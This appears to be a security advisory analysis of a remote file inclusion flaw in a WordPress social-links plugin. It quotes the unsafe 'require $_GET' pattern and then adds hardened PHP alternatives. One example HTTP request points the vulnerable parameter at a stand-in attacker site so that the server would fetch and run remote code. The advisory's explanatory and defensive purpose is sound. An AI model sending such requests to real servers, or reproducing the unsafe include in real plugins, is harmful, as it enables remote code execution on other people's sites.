Advisory
Secunia Advisory SA51346
Analysis
The fsml-admin.js.php and fsml-hideshow.js.php files both require a GET parameter that specifies the path to the wp-load.php file, which is used to initialize the WordPress backend.
    // include the wordpress environment, so we can get the options and
    // write the js accordingly
    require $_GET['wpp'] . '/wp-load.php';
However, the wpp parameter is used without any validation that it does not contain malicious input. One can thus supply a URL pointing to malicious PHP code, which the remote host will then execute, like this:
    GET /wordpress/wp-content/plugins/floating-social-media-links/fsml-hideshow.js.php?wpp=http://myevilsite.com HTTP/1.1
    Host: 192.168.80.130
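The following is an added example, not code from the plugin or from the advisory. It places the unsafe include pattern quoted above beside two hardened alternatives: locating wp-load.php from the plugin file's own position (the usual fix, since the bootstrap file is always a fixed number of directories above a plugin) and, where an override parameter must be kept, validating it against an allowed base directory. The function names, the depth limit of 5 and the regex for URL schemes are assumptions made for this example.

```php
<?php
// Added example (not the plugin's code): the advisory's unsafe pattern next
// to hardened ways of locating wp-load.php.

// UNSAFE: the include path is taken straight from the request. With
// allow_url_include enabled this is remote file inclusion; even without it,
// any readable local directory containing a wp-load.php can be pulled in.
function load_wp_unsafe(): void {
    require $_GET['wpp'] . '/wp-load.php';
}

// HARDENED (preferred): never derive the include path from request data.
// A plugin file lives under wp-content/plugins/<plugin>/, so wp-load.php is a
// few directories above it. Walk upward from __DIR__ and stop at the first
// hit; refuse to continue if none is found. The limit of 5 is an assumption
// that covers common non-standard wp-content layouts.
function find_wp_load(string $start_dir, int $max_depth = 5): ?string {
    $dir = realpath($start_dir);
    if ($dir === false) {
        return null;
    }
    for ($i = 0; $i <= $max_depth; $i++) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-load.php';
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) {   // reached the filesystem root
            break;
        }
        $dir = $parent;
    }
    return null;
}

function load_wp_hardened(): void {
    $wp_load = find_wp_load(__DIR__);
    if ($wp_load === null) {
        http_response_code(500);
        exit('wp-load.php not found');
    }
    require $wp_load;
}

// HARDENED (if an override must be accepted): reject anything with a URL
// scheme or NUL byte, resolve the value with realpath(), require it to sit
// inside $allowed_base, and require the target file to exist there.
// Returns the safe absolute path or null.
function validate_wp_path(string $wpp, string $allowed_base): ?string {
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $wpp) || strpos($wpp, "\0") !== false) {
        return null;   // http://, ftp://, php://, data:// etc. are never acceptable
    }
    $real = realpath($wpp);
    $base = realpath($allowed_base);
    if ($real === false || $base === false) {
        return null;   // non-existent path or unresolvable base
    }
    // Compare with a trailing separator so /var/www/wp2 does not pass for /var/www/wp.
    $base_prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($real . DIRECTORY_SEPARATOR, $base_prefix) !== 0) {
        return null;   // outside the allowed base (covers ../ traversal)
    }
    $file = $real . DIRECTORY_SEPARATOR . 'wp-load.php';
    return is_file($file) ? $file : null;
}

function load_wp_with_override(string $allowed_base): void {
    $wp_load = isset($_GET['wpp'])
        ? validate_wp_path((string) $_GET['wpp'], $allowed_base)
        : find_wp_load(__DIR__);
    if ($wp_load === null) {
        http_response_code(400);
        exit('invalid wp-load.php location');
    }
    require $wp_load;
}
```

The first hardened variant removes the parameter entirely, which is what most WordPress plugins do; the second is only for cases where a documented override genuinely has to stay, and even then the realpath() plus prefix check confines it to the site's own tree.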